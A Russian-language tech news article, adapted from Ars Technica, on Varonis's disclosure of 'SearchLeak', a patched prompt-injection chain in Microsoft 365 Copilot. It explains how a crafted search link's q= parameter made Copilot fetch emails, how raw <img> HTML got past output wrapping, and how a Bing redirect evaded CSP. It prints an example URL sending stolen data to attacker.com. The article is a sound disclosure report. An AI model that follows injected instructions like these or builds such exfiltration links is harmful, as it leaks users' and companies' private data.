Уязвимость в Microsoft Copilot позволяла красть коды двухфакторной аутентификации

Исследователи из компании Varonis опубликовали детальное описание атаки SearchLeak — цепочки уязвимостей в Microsoft 365 Copilot, которая позволяла злоумышленникам похищать корпоративные данные, включая коды двухфакторной аутентификации. Для успешной атаки жертве не нужно было вводить никаких данных — достаточно одного клика по ссылке. Microsoft устранила уязвимости во вторник, однако эксперты предупреждают: системная причина подобных атак никуда не делась.

Как работала атака: один клик вместо взлома

Атака строилась на технике Parameter-to-Prompt Injection. Злоумышленник отправлял жертве письмо со специально сформированной ссылкой вида `https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=`. В параметр `q=` встраивалась инструкция для Copilot — например, найти письма пользователя, извлечь их содержимое и передать данные наружу.

Copilot выполнял инструкцию беспрекословно. Как отметили исследователи, поисковая функциональность ИИ-ассистента оказалась идеальным инструментом для атаки: даже если у пользователя ограниченные права, доступ к критически важной информации делает его мишенью.

Ключевой элемент схемы — обход защитного механизма, который должен был блокировать подобные действия. В норме Copilot оборачивает вывод в блоки `<code>`, не позволяя браузеру рендерить произвольный HTML. Однако исследователи выяснили: эта защита срабатывает только после фазы «размышления» модели.

Пока Copilot генерировал ответ, браузер уже получал необработанный HTML — в том числе тег `<img>` с URL, содержащим похищенные данные. Браузер немедленно отправлял HTTP-запрос по этому адресу. К моменту, когда защита оборачивала вывод в `<code>`, запрос уже ушёл. Данные покинули периметр.

Bing как «трамплин» для обхода политики безопасности

Оставалась ещё одна преграда: политика безопасности контента Copilot запрещает отправку запросов на произвольные внешние домены. Исследователи обошли её, использовав Bing в качестве промежуточного звена.

Поисковик Microsoft входит в список доверенных ресурсов согласно CSP-политике Copilot. Схема выглядела так: браузер жертвы отправлял запрос на Bing, а тот перенаправлял его на домен злоумышленника. Итоговый URL имел вид:

`https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.png`

Таким образом, похищенные данные оказывались встроены прямо в URL изображения и уходили на сервер атакующего через доверенный ресурс Microsoft.

По оценке Varonis, масштаб потенциального ущерба от SearchLeak выходит далеко за рамки личной переписки. Атака затрагивает корпоративный уровень Microsoft 365 Enterprise: под угрозой оказываются письма и приглашения из календаря, заметки из встреч, документы SharePoint, файлы OneDrive и любой другой контент, проиндексированный в M365. В зависимости от того, как M365 интегрирован в инфраструктуру организации, «радиус поражения» мог быть ещё шире.

Системная проблема, которую патчем не закрыть

Microsoft оперативно устранила конкретные уязвимости, которые эксплуатировала атака SearchLeak. Однако исследователи Varonis указывают на принципиальное ограничение: корневая причина подобных атак — архитектурная особенность больших языковых моделей, которые по своей природе склонны следовать инструкциям, встроенным в обрабатываемый контент.

Пока ИИ-ассистенты имеют доступ к корпоративным данным и способны выполнять действия от имени пользователя, техники prompt injection будут оставаться актуальными. Каждый новый барьер создаёт стимул искать новый обход — и этот цикл, по мнению экспертов, будет повторяться.

Для белорусских компаний, работающих в периметре ПВТ и активно использующих Microsoft 365, история с SearchLeak — наглядный аргумент в пользу регулярного аудита прав доступа в M365 и настройки политик условного доступа. Корпоративный Copilot «видит» ровно столько, сколько видит сам пользователь: чем шире права учётной записи, тем ценнее она как цель для атаки через ИИ-ассистента.

Отдельного внимания заслуживает вектор через электронную почту: атака начиналась с обычного письма со ссылкой. Никакого вредоносного вложения, никакого исполняемого кода — только URL и готовность Copilot следовать инструкциям. Это означает, что традиционные антивирусные решения и фильтры вложений подобную угрозу не обнаружат.

— По материалам Ars Technica: оригинальная статья. Перевод и адаптация — редакция Digital Business.